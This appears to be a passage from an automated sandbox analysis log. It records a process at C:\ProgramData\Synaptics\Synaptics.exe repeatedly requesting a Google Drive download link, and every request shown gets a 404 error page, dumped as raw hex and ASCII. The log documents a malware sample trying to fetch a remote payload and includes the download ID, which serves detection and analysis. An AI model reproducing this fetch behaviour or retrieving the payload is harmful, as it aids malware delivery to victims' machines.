                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                        2022-05-17 11:31:36 UTC175INData Raw: 36 36 61 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 46 47 73 30 6a 37 4d 51 31 70 75 4a 73 51 51 44 53 35 72 42 79 77 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73
                                                                                                                                                                                        Data Ascii: 66a<html lang=en><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="FGs0j7MQ1puJsQQDS5rByw">*{margin:0;padding:0}html,code{font:15px/22px arial,sans
                                                                                                                                                                                        2022-05-17 11:31:36 UTC176INData Raw: 6c 3d 47 6f 6f 67 6c 65 20 72 6f 6c 65 3d 69 6d 67 3e 3c 2f 73 70 61 6e 3e 3c 2f 61 3e 3c 70 3e 3c 62 3e 34 30 34 2e 3c 2f 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e 0d 0a
                                                                                                                                                                                        Data Ascii: l=Google role=img></span></a><p><b>404.</b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>
                                                                                                                                                                                        2022-05-17 11:31:36 UTC177INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                        58192.168.2.349808142.250.186.46443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                                                        2022-05-17 11:31:36 UTC173OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                                                                        Host: docs.google.com
                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                        2022-05-17 11:31:36 UTC177INHTTP/1.1 404 Not Found
                                                                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                        Date: Tue, 17 May 2022 11:31:36 GMT
                                                                                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-k05D/Zol87qAUk7GvKcQ2w' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                        Server: ESF
                                                                                                                                                                                        X-XSS-Protection: 0
                                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
                                                                                                                                                                                        Accept-Ranges: none
                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                        2022-05-17 11:31:36 UTC178INData Raw: 36 36 61 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 3c 6d 65 74 61 20 63 68
                                                                                                                                                                                        Data Ascii: 66a<html lang=en><meta ch
                                                                                                                                                                                        2022-05-17 11:31:36 UTC178INData Raw: 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 57 6c 32 65 59 72 44 32 56 54 70 73 68 4f 67 41 77 38 73 52 63 67 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66
                                                                                                                                                                                        Data Ascii: arset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="Wl2eYrD2VTpshOgAw8sRcg">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff
                                                                                                                                                                                        2022-05-17 11:31:36 UTC179INData Raw: 30 25 7d 7d 23 6c 6f 67 6f 7b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 68 65 69 67 68 74 3a 35 34 70 78 3b 77 69 64 74 68 3a 31 35 30 70 78 7d 3c 2f 73 74 79 6c 65 3e 3c 6d 61 69 6e 20 69 64 3d 22 61 66 2d 65 72 72 6f 72 2d 63 6f 6e 74 61 69 6e 65 72 22 20 72 6f 6c 65 3d 22 6d 61 69 6e 22 3e 3c 61 20 68 72 65 66 3d 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 3e 3c 73 70 61 6e 20 69 64 3d 6c 6f 67 6f 20 61 72 69 61 2d 6c 61 62 65 6c 3d 47 6f 6f 67 6c 65 20 72 6f 6c 65 3d 69 6d 67 3e 3c 2f 73 70 61 6e 3e 3c 2f 61 3e 3c 70 3e 3c 62 3e 34 30 34 2e 3c 2f 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20
                                                                                                                                                                                        Data Ascii: 0%}}#logo{display:inline-block;height:54px;width:150px}</style><main id="af-error-container" role="main"><a href=//www.google.com><span id=logo aria-label=Google role=img></span></a><p><b>404.</b> <ins>Thats an error.</ins><p>The requested URL was not
                                                                                                                                                                                        2022-05-17 11:31:36 UTC180INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                        59192.168.2.349811142.250.186.46443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                                                        2022-05-17 11:31:36 UTC177OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                                                                        Host: docs.google.com
                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                        2022-05-17 11:31:37 UTC180INHTTP/1.1 404 Not Found
                                                                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                        Date: Tue, 17 May 2022 11:31:37 GMT
                                                                                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-Q9+GTaAsWoNFVL2nJWwEJg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                                        Server: ESF
                                                                                                                                                                                        X-XSS-Protection: 0
                                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
                                                                                                                                                                                        Accept-Ranges: none
                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                        2022-05-17 11:31:37 UTC181INData Raw: 36 36 61 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 3c 6d 65 74 61 20 63 68
                                                                                                                                                                                        Data Ascii: 66a<html lang=en><meta ch
                                                                                                                                                                                        2022-05-17 11:31:37 UTC181INData Raw: 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 5a 6f 65 51 69 6c 32 31 63 32 66 67 56 78 76 66 32 7a 48 78 30 67 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66
                                                                                                                                                                                        Data Ascii: arset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="ZoeQil21c2fgVxvf2zHx0g">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff
                                                                                                                                                                                        2022-05-17 11:31:37 UTC182INData Raw: 30 25 7d 7d 23 6c 6f 67 6f 7b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 68 65 69 67 68 74 3a 35 34 70 78 3b 77 69 64 74 68 3a 31 35 30 70 78 7d 3c 2f 73 74 79 6c 65 3e 3c 6d 61 69 6e 20 69 64 3d 22 61 66 2d 65 72 72 6f 72 2d 63 6f 6e 74 61 69 6e 65 72 22 20 72 6f 6c 65 3d 22 6d 61 69 6e 22 3e 3c 61 20 68 72 65 66 3d 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 3e 3c 73 70 61 6e 20 69 64 3d 6c 6f 67 6f 20 61 72 69 61 2d 6c 61 62 65 6c 3d 47 6f 6f 67 6c 65 20 72 6f 6c 65 3d 69 6d 67 3e 3c 2f 73 70 61 6e 3e 3c 2f 61 3e 3c 70 3e 3c 62 3e 34 30 34 2e 3c 2f 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20
                                                                                                                                                                                        Data Ascii: 0%}}#logo{display:inline-block;height:54px;width:150px}</style><main id="af-error-container" role="main"><a href=//www.google.com><span id=logo aria-label=Google role=img></span></a><p><b>404.</b> <ins>Thats an error.</ins><p>The requested URL was not
                                                                                                                                                                                        2022-05-17 11:31:37 UTC183INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                        6192.168.2.349741142.250.186.46443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                                                        2022-05-17 11:31:29 UTC15OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                                                                        Host: docs.google.com
                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                        2022-05-17 11:31:30 UTC18INHTTP/1.1 404 Not Found
                                                                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                        Date: Tue, 17 May 2022 11:31:29 GMT
                                                                                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-koTFLqWozZy+Ww6+7yNP6Q' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                                        Server: ESF
                                                                                                                                                                                        X-XSS-Protection: 0
                                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
                                                                                                                                                                                        Accept-Ranges: none
                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                        2022-05-17 11:31:30 UTC20INData Raw: 36 36 61 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 3c 6d 65 74 61 20 63 68
                                                                                                                                                                                        Data Ascii: 66a<html lang=en><meta ch
                                                                                                                                                                                        2022-05-17 11:31:30 UTC20INData Raw: 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 7a 54 59 6f 48 32 30 79 52 6c 38 65 48 46 63 41 76 67 72 73 49 67 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66
                                                                                                                                                                                        Data Ascii: arset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="zTYoH20yRl8eHFcAvgrsIg">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff
                                                                                                                                                                                        2022-05-17 11:31:30 UTC21INData Raw: 30 25 7d 7d 23 6c 6f 67 6f 7b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 68 65 69 67 68 74 3a 35 34 70 78 3b 77 69 64 74 68 3a 31 35 30 70 78 7d 3c 2f 73 74 79 6c 65 3e 3c 6d 61 69 6e 20 69 64 3d 22 61 66 2d 65 72 72 6f 72 2d 63 6f 6e 74 61 69 6e 65 72 22 20 72 6f 6c 65 3d 22 6d 61 69 6e 22 3e 3c 61 20 68 72 65 66 3d 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 3e 3c 73 70 61 6e 20 69 64 3d 6c 6f 67 6f 20 61 72 69 61 2d 6c 61 62 65 6c 3d 47 6f 6f 67 6c 65 20 72 6f 6c 65 3d 69 6d 67 3e 3c 2f 73 70 61 6e 3e 3c 2f 61 3e 3c 70 3e 3c 62 3e 34 30 34 2e 3c 2f 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20
                                                                                                                                                                                        Data Ascii: 0%}}#logo{display:inline-block;height:54px;width:150px}</style><main id="af-error-container" role="main"><a href=//www.google.com><span id=logo aria-label=Google role=img></span></a><p><b>404.</b> <ins>Thats an error.</ins><p>The requested URL was not
                                                                                                                                                                                        2022-05-17 11:31:30 UTC21INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                        60192.168.2.349812142.250.186.46443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                                                        2022-05-17 11:31:37 UTC180OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                                                                        Host: docs.google.com
                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                        2022-05-17 11:31:37 UTC183INHTTP/1.1 404 Not Found
                                                                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                        Date: Tue, 17 May 2022 11:31:37 GMT
                                                                                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-6OlFSOcEjuE9hieFbs6XfA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                        Server: ESF
                                                                                                                                                                                        X-XSS-Protection: 0
                                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
                                                                                                                                                                                        Accept-Ranges: none
                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                        2022-05-17 11:31:37 UTC184INData Raw: 36 36 61 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 3c 6d 65 74 61 20 63 68
                                                                                                                                                                                        Data Ascii: 66a<html lang=en><meta ch
                                                                                                                                                                                        2022-05-17 11:31:37 UTC184INData Raw: 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 4b 48 57 42 4b 4e 69 50 65 76 49 38 61 4b 39 7a 73 4f 4f 2b 50 77 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66
                                                                                                                                                                                        Data Ascii: arset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="KHWBKNiPevI8aK9zsOO+Pw">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff
                                                                                                                                                                                        2022-05-17 11:31:37 UTC185INData Raw: 30 25 7d 7d 23 6c 6f 67 6f 7b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 68 65 69 67 68 74 3a 35 34 70 78 3b 77 69 64 74 68 3a 31 35 30 70 78 7d 3c 2f 73 74 79 6c 65 3e 3c 6d 61 69 6e 20 69 64 3d 22 61 66 2d 65 72 72 6f 72 2d 63 6f 6e 74 61 69 6e 65 72 22 20 72 6f 6c 65 3d 22 6d 61 69 6e 22 3e 3c 61 20 68 72 65 66 3d 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 3e 3c 73 70 61 6e 20 69 64 3d 6c 6f 67 6f 20 61 72 69 61 2d 6c 61 62 65 6c 3d 47 6f 6f 67 6c 65 20 72 6f 6c 65 3d 69 6d 67 3e 3c 2f 73 70 61 6e 3e 3c 2f 61 3e 3c 70 3e 3c 62 3e 34 30 34 2e 3c 2f 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20
                                                                                                                                                                                        Data Ascii: 0%}}#logo{display:inline-block;height:54px;width:150px}</style><main id="af-error-container" role="main"><a href=//www.google.com><span id=logo aria-label=Google role=img></span></a><p><b>404.</b> <ins>Thats an error.</ins><p>The requested URL was not
                                                                                                                                                                                        2022-05-17 11:31:37 UTC186INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                        61192.168.2.349813142.250.186.46443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                                                        2022-05-17 11:31:37 UTC183OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                                                                        Host: docs.google.com
                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                        2022-05-17 11:31:37 UTC186INHTTP/1.1 404 Not Found
                                                                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                        Date: Tue, 17 May 2022 11:31:37 GMT
                                                                                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-dg6Z4/e0xCdz5jpqqks6/Q' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                        Server: ESF
                                                                                                                                                                                        X-XSS-Protection: 0
                                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
                                                                                                                                                                                        Accept-Ranges: none
                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                        2022-05-17 11:31:37 UTC187INData Raw: 36 36 61 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 3c 6d 65 74 61 20 63 68
                                                                                                                                                                                        Data Ascii: 66a<html lang=en><meta ch
